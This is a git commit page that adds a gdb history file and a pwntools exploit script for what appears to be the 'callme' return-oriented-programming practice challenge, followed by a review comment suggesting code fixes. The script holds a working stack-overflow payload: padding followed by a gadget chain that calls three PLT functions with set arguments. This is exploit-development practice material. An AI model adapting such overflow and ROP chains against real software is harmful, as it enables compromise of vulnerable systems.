authorBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 17:45:09 -0600
committerBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 17:45:09 -0600
commit3f0a1e64c7e7b410ad5f4e2024cd692536389449 (patch)
tree6474bed612527dd0ca7bc9d2f7096769fd212d14 /x86_64/callme
parent2ddedfeb9199c2ff01b540edf92a4f7d69455c16 (diff)
new file: x86_64/write4/exploit.py
new file: x86_64/write4/useful_gadgets
Diffstat (limited to 'x86_64/callme')
-rw-r--r--x86_64/callme/.gdb_history12
-rwxr-xr-xx86_64/callme/exploit2.py55
2 files changed, 67 insertions, 0 deletions
diff --git a/x86_64/callme/.gdb_history b/x86_64/callme/.gdb_history
new file mode 100644
index 0000000..451f131
--- /dev/null
+++ b/x86_64/callme/.gdb_history
@@ -0,0 +1,12 @@
+break pwnme
+run
+stepi
+return
+stepi
+nexti
+nexti
+q
+break pwnme
+run
+nexti
+quit
diff --git a/x86_64/callme/exploit2.py b/x86_64/callme/exploit2.py
new file mode 100755
index 0000000..b6d228f
--- /dev/null
+++ b/x86_64/callme/exploit2.py
@@ -0,0 +1,55 @@
+#!/usr/bin/env python3
+from pwn import *
+
+usefulGadgets = p64(0x000000000040093c)
+# pop rdi
+# pop rsi
+# pop rdx
+# ret
+
+arg1 = p64(0xdeadbeefdeadbeef)
+arg2 = p64(0xcafebabecafebabe)
+arg3 = p64(0xd00df00dd00df00d)
+
+callme_1_plt = p64(0x0000000000400720)
+callme_2_plt = p64(0x0000000000400740)
+callme_3_plt = p64(0x00000000004006f0)
+
+#jmp qword ptr [rbp]
+#jmp rax
+#jmp qword ptr [rax]
+#pop rbp ; ret
+
+#pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret <- change stack pointer to fin (or some other writable executable part)
+
+
+prog = process('./callme')
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_1_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_2_plt
+
+payload += usefulGadgets
+payload += arg1
+payload += arg2
+payload += arg3
+payload += callme_3_plt
+
+
+
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
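Review bot: `payload += b"\n"` followed by `prog.sendline(payload)` sends the line terminator twice, because `sendline` appends its own newline; either drop the explicit `b"\n"` or use `prog.send(payload)`. The closing `sleep(1)` / `prog.recv()` pair is timing-dependent: `recv()` returns whatever happens to be buffered after one second and raises `EOFError` if the child has already exited, so `print(prog.recvall(timeout=1).decode())` is the deterministic form and removes the sleep. The padding loop is the literal `payload = b'a' * 40`, and the hard-coded gadget and PLT addresses at lines 45–57 deserve a one-line comment naming the binary they were read from, since they are only valid for that exact build (presumably a fixed-address one, given the 0x40xxxx values — confirm). The `process` handle is never closed; a final `prog.close()` keeps the child from lingering after the read.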